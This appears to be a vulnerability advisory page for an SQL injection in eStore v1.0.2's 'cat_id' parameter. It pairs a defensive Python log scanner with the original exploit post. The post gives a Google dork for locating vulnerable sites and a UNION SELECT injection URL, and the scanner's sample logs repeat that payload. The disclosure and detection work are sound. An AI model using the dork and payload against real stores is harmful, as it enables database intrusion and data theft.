Vendor: eStore
By: R3VAN_BASTARD
CVSS: 9 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: eStore
Affected Version From: eStore v1.0.2
Affected Version To: eStore v1.0.2
Patch Exists: YES
Related CWE: N/A
CPE: cpe:a:estore:estore:1.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Powered by eStore v1.0.2

The vulnerability exists in the eStore v1.0.2 web application due to improper sanitization of user-supplied input in the 'cat_id' parameter of the 'store.php' script. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database.

Mitigation:

The vendor has released a patch to address this vulnerability.
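
Until the patch is applied, requests that abuse 'cat_id' can be spotted in web server logs. The scanner below is an added example, not part of the original advisory or the vendor's code; it assumes combined-format access logs and that a legitimate category id is a short decimal integer, and the sample log lines and the /shop/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a short run of decimal digits.
VALID_CAT_ID = re.compile(r"[0-9]{1,10}")

def suspicious_cat_ids(line):
    """Return the decoded cat_id values in one log line that are not plain integers."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/store.php"):
        return []
    # parse_qs decodes %xx and '+' once; keep_blank_values so "cat_id=" is seen.
    values = parse_qs(url.query, keep_blank_values=True).get("cat_id", [])
    flagged = []
    for v in values:
        # Decode a second time to catch double-encoded input such as %2527.
        decoded = unquote_plus(v)
        if not VALID_CAT_ID.fullmatch(decoded):
            flagged.append(decoded)
    return flagged

def scan(lines):
    """Return (client_ip, bad_value) pairs for every flagged request."""
    hits = []
    for line in lines:
        for bad in suspicious_cat_ids(line):
            hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /shop/store.php?cat_id=7 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2009:10:00:05 +0000] "GET /shop/store.php?cat_id=00+AND+1=2+UNION+SELECT+1,2,3-- HTTP/1.1" 200 812',
    '198.51.100.4 - - [01/Jan/2009:10:00:09 +0000] "GET /shop/store.php?cat_id=3%2527 HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2009:10:00:12 +0000] "GET /shop/index.php?cat_id=x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric cat_id: {value!r}")
```

The same integer-only rule is what the application itself should enforce on 'cat_id' before the value reaches a query.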

Exploit-DB raw data:

=====================================================================================================
                                         .::Powered by eStore v1.0.2::.
=====================================================================================================
[x] Author   : R3VAN_BASTARD
[x] Web      : www.sux0r.net
[x] Download : http://brooky.com (RIP)
=====================================================================================================
Dork: intext:"Powered by eStore v1.0.2"

Exploit: /path/store.php?cat_id=00+AND+1=2+UNION+SELECT+[SQLi],2,3,4,5,6,7,8,9,10,11,12,13,14,15--

=====================================================================================================
Warm regards:
VALENCIA : S3TAN : YOGA0400 : VRS-HCK : JACK : MADONK : EMINEM : OON BOY : HANTU
YUDIS TIRA SUMANTRI : KECEMPLUNG-KALEN : DECLINED : JAROMIL ROJO :COZZY NET
JUPE NET : MAINHACK : SERVER IS DOWN